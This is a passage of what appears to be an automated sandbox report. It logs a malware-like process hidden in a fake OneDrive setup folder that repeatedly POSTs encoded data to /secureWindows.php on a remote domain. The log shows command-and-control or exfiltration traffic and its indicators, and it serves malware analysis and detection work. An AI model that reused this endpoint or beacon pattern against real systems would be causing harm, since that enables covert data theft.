                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36ftcpVsemSGDzmSkG4HTraz4WssQgi1HyVWMaFpnyWo3YRu%2BwHa55loXdR%2FEpmwkecVygrrI5O0TVCUOpXNI9C6m0roUjtruE%2Bopq9HcHaz7rzisvOx3mVUtgZKg82%2BSlk2ejw8WmI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fe179b7e7aa-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1310&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1137470&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.449762188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:30.063885927 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:30.417610884 CET1072OUTData Raw: 57 57 5c 55 55 59 56 57 58 57 50 59 55 58 5b 5b 54 5d 5c 5f 59 5d 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\UUYVWXWPYUX[[T]\_Y]ZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/-?*0-.51?/,#'':+_+*&;9:* F$,Z*!
                                                        Oct 30, 2024 05:22:30.669910908 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:30.981450081 CET792INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rBd7JkQHhfp8%2BmZ%2FiVUcZllYEV6v8rWEVVuXX44CoFnSnzx%2F71Dja4SodXTJjc8H2SF673aMiRi4o81oE5NyvQfLRzMRZn0ZsK%2B9JQcF9vwJ%2BijD2eB1Lr7xJJPNNEo59N%2F2shkj4E%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fe94a1b2e1e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1295&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1136577&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.449763188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:31.113405943 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:31.464392900 CET1076OUTData Raw: 52 52 5c 53 55 5d 53 57 58 57 50 59 55 5c 5b 59 54 53 5c 5c 59 55 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RR\SU]SWXWPYU\[YTS\\YUZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;.^+^9'[?D9#$=-)(Z #&0?C!$8>:: F$,Z*5


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.449764188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:31.508161068 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:31.855062008 CET1340OUTData Raw: 52 53 5c 52 50 59 56 56 58 57 50 59 55 59 5b 5a 54 5c 5c 59 59 56 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\RPYVVXWPYUY[ZT\\YYVZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%];32=;&]0>(:%4$=/47*1?]+52$89 F$,Z*!
                                                        Oct 30, 2024 05:22:32.107992887 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:32.443999052 CET934INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qRFeLqp%2Fhlhjp2XNEHDaaQMH5Hy9IVOgCHC1YshqalafjlUZcNuoMrnRUflhtC6rSEhkJpBBVxyyiknwnrrjCWku1rCHoWHydGAyw0b%2BmEXVDBR1BQuG8KfSFPet3aQBd0xXUqEfI%2Bg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89ff25adcc872-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1624&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=936005&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 25 0e 3c 28 2c 1d 32 55 2d 03 29 2c 3d 10 3e 58 26 15 33 0f 2b 07 25 2c 0c 58 3c 15 3f 10 29 1d 28 10 3f 32 09 00 23 36 33 01 29 3b 2f 46 0c 10 27 1d 26 31 28 0b 29 30 39 11 3e 3b 30 04 23 30 29 04 29 29 3f 56 35 30 24 5b 33 21 2e 57 2f 2d 3e 1d 2e 1b 32 12 2e 23 34 52 2a 3a 21 57 08 14 22 10 25 02 33 5c 32 03 30 59 25 0c 04 5b 34 59 23 1f 35 15 0f 05 28 38 34 55 32 33 23 01 30 0d 20 0f 31 17 05 06 3c 21 23 57 32 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98%<(,2U-),=>X&3+%,X<?)(?2#63);/F'&1()09>;0#0)))?V50$[3!.W/->.2.#4R*:!W"%3\20Y%[4Y#5(84U23#0 1<!#W2"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.449765188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:31.640053988 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:31.995739937 CET1076OUTData Raw: 57 5f 59 56 50 5a 53 50 58 57 50 59 55 5f 5b 5a 54 53 5c 5a 59 56 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_YVPZSPXWPYU_[ZTS\ZYVZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%-0>\+90><:C+$= [/)$\4'X2)$(6&8=X.* F$,Z*
                                                        Oct 30, 2024 05:22:32.417898893 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:32.454818964 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:32.542638063 CET790INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fT1seBa3%2B3fB1lkgApxdJzn9iWRYBB6pyS%2FUeAC29ZVdTAi4nrD5K7Fj4pe05OTG3eLatv5UB%2FkLgzdC7mJMsLhsF9o3EThCocGapUNE7EcN5%2Ft2y23Cur%2BbtrQiaHfWyuXdXq9fmNg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89ff32c3b2cc7-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1292857&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.449766188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:32.669368029 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:33.026966095 CET1076OUTData Raw: 57 56 5c 50 55 55 53 56 58 57 50 59 55 51 5b 5a 54 52 5c 58 59 50 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WV\PUUSVXWPYUQ[ZTR\XYPZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^83:?(=$<-5(1=^; *+Z&_ +%'8.* F$,Z*
                                                        Oct 30, 2024 05:22:33.268182993 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:33.465444088 CET787INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pbK5o48WaMvTIoelNHLZIntbpHzK%2BeXq796P%2FPLU05qlDyGnbLOzVfrqEvu59oYOvMku8Tx%2FMylBWLkCJw5Igld2hYyPWEsP%2FQ2BeZfQar5wVLCzGSJRbq00k4VIZ8EEKMj8tjca8M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89ff999c32e21-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2069&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=707031&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.449767188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:33.595273972 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:33.949769974 CET1076OUTData Raw: 57 56 59 56 55 5a 53 52 58 57 50 59 55 5c 5b 58 54 5e 5c 58 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WVYVUZSRXWPYU\[XT^\XYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/==(>'=7A,&/$>;-* ]1$+5'6: F$,Z*5
                                                        Oct 30, 2024 05:22:34.197993994 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:34.422835112 CET794INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pScZ%2FvaXRp4QxkUxGuI3jLrj7oIQLrlklWmSsXW%2FiJxxJ3dGHQmsDivGKlAaIDlzo%2BTMjN0WLjaHSUFnoeyzXiOrUet4KUWQymHTIQo%2FoeGzsg2w1AWM%2FUenhjr%2Bs2okouP%2BQ7iiJOQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fff6efb3156-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1333333&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.449768188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:34.546958923 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:34.937462091 CET1072OUTData Raw: 57 5e 5c 55 50 5d 56 51 58 57 50 59 55 58 5b 53 54 5b 5c 59 59 52 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\UP]VQXWPYUX[ST[\YYRZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,3-?8.Y$.+@:&7%>;/\' 9?Z%:++%$(!X9 F$,Z*
                                                        Oct 30, 2024 05:22:35.156927109 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:35.461256981 CET778INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56YPrD4Q1GZu1ielfLGdc05dGnej9GwKjElim29l6ZPONVK0%2F0MxKmudQ8e23dwl5f0MCwWDB2G2CTaqOLWaWxx7egLlWXuo0qSMLMy8npnv5W54yC%2BsFhf0gfc427KjdMORNoXqtSk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a005690ea924-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1921&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=753774&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:35.461453915 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.449769188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:35.656249046 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:36.011576891 CET1076OUTData Raw: 57 5f 5c 5d 55 55 53 55 58 57 50 59 55 5b 5b 5a 54 5f 5c 54 59 53 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\]UUSUXWPYU[[ZT_\TYSZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&-32Y(+>Z$>'D-54&8[/ */Y&:?]?&&';=/: F$,Z*)
                                                        Oct 30, 2024 05:22:36.272736073 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:36.572256088 CET792INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iFeDAWpHDLaeHOgyyXnuGcyoBzfad0%2FQvnYUaaPb2lw37cC7oskyyuWh39303P%2BrAbDcIpmH2WvD4MeT5UP2O%2BfR0MmtnYwQ9lNFEEQfByhFvqhlGa64Vm%2BE%2F%2BbM41cgmauw645q1w%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a00c4d9b28b3-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1377&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1085457&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.449770188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:36.702848911 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:37.058192015 CET1076OUTData Raw: 57 5e 5c 57 55 55 56 50 58 57 50 59 55 5c 5b 5c 54 5d 5c 59 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\WUUVPXWPYU\[\T]\YYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,%?(*$=?D-%0&;-);":Y1??:'9 F$,Z*5
                                                        Oct 30, 2024 05:22:37.323285103 CET25INHTTP/1.1 100 Continue


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.449771188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:37.456464052 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:37.808242083 CET1340OUTData Raw: 52 54 5c 50 50 59 53 52 58 57 50 59 55 51 5b 5d 54 52 5c 54 59 53 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\PPYSRXWPYUQ[]TR\TYSZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,1?8-'?: Z%-0[-)(["*;[&)?^?=[385:: F$,Z*
                                                        Oct 30, 2024 05:22:38.131815910 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:38.359138966 CET937INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFQLp4CVxKNe2XRu3CWWPuEL6uCQ5tyw1UipyaVNc23JEZGN4fWtWYm8ux8TNeHfsjzo%2BVu%2FyaJ5%2FrQe5HeLXw2WnBK2na1Mtjd9QvfBG3claI6Qmmi%2BwoUw6kY8QoTcSKG11nlOO6k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0177c9aeb2f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1233390&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
